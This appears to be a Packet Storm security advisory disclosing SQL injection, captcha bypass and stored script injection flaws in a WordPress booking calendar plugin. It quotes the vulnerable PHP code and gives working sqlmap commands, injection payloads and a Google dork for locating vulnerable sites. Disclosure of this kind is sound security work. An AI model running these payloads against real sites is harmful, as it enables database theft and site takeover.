WordPress Booking Calendar Contact Form plugin version 1.0.2 suffers from cross site scripting and remote SQL injection vulnerabilities.
634d97d85a3a0669c521ef17cf7084d41acd83e7ce20d66da98dcc013771b672# Exploit Title: WordPress Booking Calendar Contact Form 1.0.2[Multiple vulnerabilities]
# Date: 2015-05-01
# Google Dork: Index of /wordpress/wp-content/plugins/booking-calendar-contact-form/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link: http://wordpress.dwbooster.com/calendars/booking-calendar-contact-form
# Vendor: CodePeople.net
# Vebdor URI: http://codepeople.net
# Version: 1.0.2
# OWASP Top10: A1-Injection
# Tested on: windows 7 ultimate + firefox + sqlmap 0.9.
============================================
* Authenticated SQL injection
============================================
========================
Description
========================
In a site that has installed the plugin vulnerable and an attacker who has
an account
editor privileges can exploit the flaw SQL injection and possibly escalate
their privileges.
========================
Vulnerability
========================
vulnerable function code is located in dex_bcf.php
function dex_bccf_load_season_prices() {
global $wpdb;
if ( ! current_user_can('edit_pages') )
{
echo 'No enough privilegies to load this content.';
exit;
}
if (!defined('CP_BCCF_CALENDAR_ID'))
define ('CP_BCCF_CALENDAR_ID',$_GET["dex_item"]);
//.....vulnerable line
$codes = $wpdb->get_results( 'SELECT * FROM
'.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE
`cal_id`='.CP_BCCF_CALENDAR_ID);
$maxcosts = 0;
...
if (count ($codes))
{
... //Print results [bueno para seleccion mediante UNION]
foreach ($codes as $value)
{
echo '<tr>';
$price = explode(';',$value->price);
echo '<td>'.$price[0].'</td>';
for ($k=1; $k<=$maxcosts; $k++)
echo '<td>'.@$price[$k].'</td>';
echo '<td>'.substr($value->date_from,0,10).'</td>';
echo '<td>'.substr($value->date_to,0,10).'</td>';
echo '<td>[<a
href="javascript:dex_delete_season_price('.$value->id.')">Delete</a>]</td>';
echo '</tr>';
}
...
}
======================
Injection
======================
the following urls can be used to inject code.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1
------------------------
GET parameter vulnerable
------------------------
dex_item
========================
injection techniques:
========================
-> UNION BASED
-> TIME BASED BLIND
=======================
POC
=======================
Obtaining all available databases from mysql server with sqlmap.
---------------------------------------------------------------
python sqlmap.py --url="
http://wp-host/wp-path/wp-admin/?action=dex_bccf_check_posted_data&dex_bccf=loadseasonprices&dex_item=1
"
-p dex_item --level=5 --risk=3 --cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE"
--dbms="mysql" --dbs
====================================================
=====================================================
* Filter bypass & Authenticated SQL injection
=====================================================
===============
Vulnerable code
================
function dex_bccf_calendar_delete($ret) {
global $wpdb;
$wpdb->query( "delete from ".TDE_BCCFCALENDAR_DATA_TABLE." where
id=".esc_sql($_POST["id"]) );
return $ret;
}
======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete
------------------------
POST parameter vulnerable
------------------------
id
========================
injection techniques:
========================
-> TIME BASED BLIND
=======================
POC
=======================
Obtaining all available databases from mysql server with sqlmap.
---------------------------------------------------------------
python sqlmap.py --url="
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=delete
"
--data="id=1" -p id --level=5 --risk=3
--cookie="PUT_YOUR_WP_EDITOR_COOKIE_HERE" --dbms="mysql" --dbs --technique T
====================================================
* Authenticated SQL injection
====================================================
===============
Vulnerable code
================
function dex_bccf_calendar_update($ret) {
global $wpdb;
dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "viadmin",
"varchar(10) DEFAULT '0' NOT NULL");
dex_bccf_add_field_verify(TDE_BCCFCALENDAR_DATA_TABLE, "color",
"varchar(10)");
$wpdb->query("update ".TDE_BCCFCALENDAR_DATA_TABLE." set
title='".esc_sql($_POST["title"])."',description='".esc_sql($_POST["description"])."',color='".esc_sql($_POST["color"])."'
where id=".esc_sql($_POST["id"]) );
return $ret;
}
======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit
------------------------
POST parameter vulnerable
------------------------
id
========================
injection techniques:
========================
-> BLIND
=======================
POC
=======================
(modifing all rows with "i0akiN" value and sleeping 5 seconds)
url
-------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=edit
----------
post data
----------
id=0 or 1=1 AND SLEEP(5) -- -
&tile=i0akiN&description=i0akiN&color=i0akiN
=====================================================
* Filter bypass & Authenticated SQL injection
=====================================================
===============
Vulnerable code
================
function dex_bccf_calendar_add($ret) {
global $wpdb;
$calid = str_replace (TDE_BCCFCAL_PREFIX, "",@$_GET["id"]);
...
$wpdb->query("insert into
".TDE_BCCFCALENDAR_DATA_TABLE."(viadmin,reservation_calendar_id,datatime_s,datatime_e,title,description,color)
".
"
values(1,".esc_sql($calid).",'".esc_sql($_POST["startdate"])."','".esc_sql($_POST["enddate"])."','".esc_sql($_POST["title"])."','"
.esc_sql($_POST["description"])."','".esc_sql($_POST["color"])."')");
..
}
======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&id=[SQLi]
========================
injection techniques:
========================
-> Insertion data
=======================
POC
=======================
Insert a row into wp_bccf_reservation_calendars_data table without use
other post parameters
http://wp-host/wp-path/wp-admin/admin-ajax.php?action=dex_bccf_calendar_ajaxevent&dex_bccf_calendar_load2=add&
id=12,0x617373,0x617373,0x617373,0x617373,0x617373); -- -
====================================================
* Unauthenticated SQL injection
====================================================
=======================
Description
=======================
An attacker without autorization can send modified requests to database and
sensitive information
that can use for escalate privilegies and more...
======================
Vulnerability
======================
vulnerable function code is located in dex_bcf.php
function dex_bccf_caculate_price($startday, $enddate, $calendar,
$default_price) {
...
//$calendar is not sanitized in sql query
$codes = $wpdb->get_results( 'SELECT * FROM
'.$wpdb->prefix.DEX_BCCF_SEASON_PRICES_TABLE_NAME_NO_PREFIX.' WHERE
`cal_id`='.$calendar);
$mode =
(dex_bccf_get_option('calendar_mode',DEX_BCCF_DEFAULT_CALENDAR_MODE) ==
'false');
while (
(($enddate>$startday) && !$mode) ||
(($enddate>=$startday) && $mode)
)
{
$daily_price = $default_price;
$sprice = array();
foreach ($codes as $value)
{
$sfrom = strtotime($value->date_from);
$sto = strtotime($value->date_to);
if ($startday >= $sfrom && $startday <= $sto)
{
$sprice = explode (';', $value->price);
$daily_price = $sprice[0];
}
}
$season_prices[] = $sprice;
$price += $daily_price;
$startday = strtotime (date("Y-m-d", $startday)." +1 day");
//60*60*24;
$days++;
}
...
}
======================
Injection
======================
Following URLs are affected.
----------------------------------------------------------
http://wp-host/wp-path/?action=dex_bccf_check_posted_data&dex_bccf=getcost
------------------------
post variable vulnerable
------------------------
dex_item=1
========================
injection techniques:
========================
-> UNION BASED <- yeaahh!!
-> TIME BASED BLIND
-> BOOLEAN BASED BLIND
========================
POC
========================
Obtaining all available databases from mysql server with sqlmap.
python sqlmap.py --url="
http://localhost/wordpress/?action=dex_bccf_check_posted_data&dex_bccf=getcost
"
--data="dex_item=1" -p dex_item --level=5 --risk=3 --dbms="mysql" --dbs
--tecnique U
===========================================================
============================================================
* Unauthenticated SQL injection 2
============================================================
========================
Description
========================
The following function is also vulnerable to SQL injection because usually
the variable
CP_BCCF_CALENDAR_ID it equals the content of POST ['dex_item'] or GET
['dex_item'] Besides this function is used in several places
the code.
========================
Vulnerability
========================
Vulnerable function:
function dex_bccf_get_option ($field, $default_value)
{
global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id;
if (!defined("CP_BCCF_CALENDAR_ID"))
return $default_value;
if ($dex_option_buffered_id == CP_BCCF_CALENDAR_ID)
$value = @$dex_option_buffered_item->$field;
else
{
//....vulnerable line
$myrows = $wpdb->get_results( "SELECT * FROM
".DEX_BCCF_CONFIG_TABLE_NAME." WHERE id=".CP_BCCF_CALENDAR_ID );
$value = @$myrows[0]->$field;
$dex_option_buffered_item = $myrows[0];
$dex_option_buffered_id = CP_BCCF_CALENDAR_ID;
}
if ($value == '' && $dex_option_buffered_item->calendar_language == '')
$value = $default_value;
return $value;
}
##########################################
======================================
* CAPTCHA BYPASS & ROW INSERTION
======================================
==============
DESCRIPTION
==============
An attacker can manipulate some variables for bypass conditional staments.
For example: insert unlimited rows into
table (could use a program)
=============
... HOW?
=============
An attacker encodes parameter GET['hdcaptcha_dex_bccf_post'] to MD5
encryption saving into value of
"rand_code" cookie.
==========
POC
==========
REQUEST
-----------
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&hdcaptcha_dex_bccf_post=1&
dex_item=1&
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data&
hdcaptcha_dex_bccf_post=1&dex_item=1&hdcaptcha_dex_bccf_post=joaquin
^
-------------- |
POST VARIABLES
--------------
hdcaptcha_dex_bccf_post=1
-------
COOKIES
-------
rand_code=a6beca7f198112079f836a4e67cf4821 <---joaquin MD5 encrypted
===========================
VULNERABLE FUNCTION CODE
==========================
function dex_bccf_check_posted_data(){
....
if (!isset($_GET['hdcaptcha_dex_bccf_post'])
||$_GET['hdcaptcha_dex_bccf_post'] == '') $_GET['hdcaptcha_dex_bccf_post']
= @$_POST['hdcaptcha_dex_bccf_post'];
if (
(dex_bccf_get_option('dexcv_enable_captcha',
TDE_BCCFDEFAULT_dexcv_enable_captcha) != 'false') &&
( (strtolower($_GET['hdcaptcha_dex_bccf_post']) !=
strtolower($_SESSION['rand_code'])) ||
($_SESSION['rand_code'] == '')
)
&&
( (md5(strtolower($_GET['hdcaptcha_dex_bccf_post'])) !=
($_COOKIE['rand_code'])) ||
($_COOKIE['rand_code'] == '')
)
)
{
$_SESSION['rand_code'] = '';
echo 'captchafailed';
exit;
}
// if this isn't the real post (it was the captcha verification) then echo
ok and exit
if ( 'POST' != $_SERVER['REQUEST_METHOD'] || ! isset(
$_POST['dex_bccf_post'] ) )
{
echo 'ok';
exit;
}
...
}
###########################################
=======================================
* Persistent JS/HTML code injection
=======================================
========================
Description:
========================
Un atacante sin autenticacion puede inyectar codigo malicioso que podria
ejecutar el navegador
de la victima(could be an administrator). Cuando la victima visite la
pagina modificada, el atacante
podria robar datos y/o controlar las acciones de la victima de forma remota.
========================
Vulnerability
========================
http://localhost/wordpress/wp-admin/admin-ajax.php?action=dex_bccf_check_posted_data
POST-DATA
dex_item=2
dex_bccf_post_options=1
email_confirmation_to_user=%3C%2Ftextarea%3E CUSTOM JS/HTML INYECTION
%3Ctextarea%3E
email_notification_to_admin=%3C%2Ftextarea%3E CUSTOM JS/HTML INYECTION
%3Ctextarea%3E
Parameters email_confirmation_to_user,email_notification_to_admin not
filtered and is included in admin page
====================
VULNERABLE FUNCTION
====================
dex_bccf_save_options() located in dex_bccf.php
save unfiltered post data
#########################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed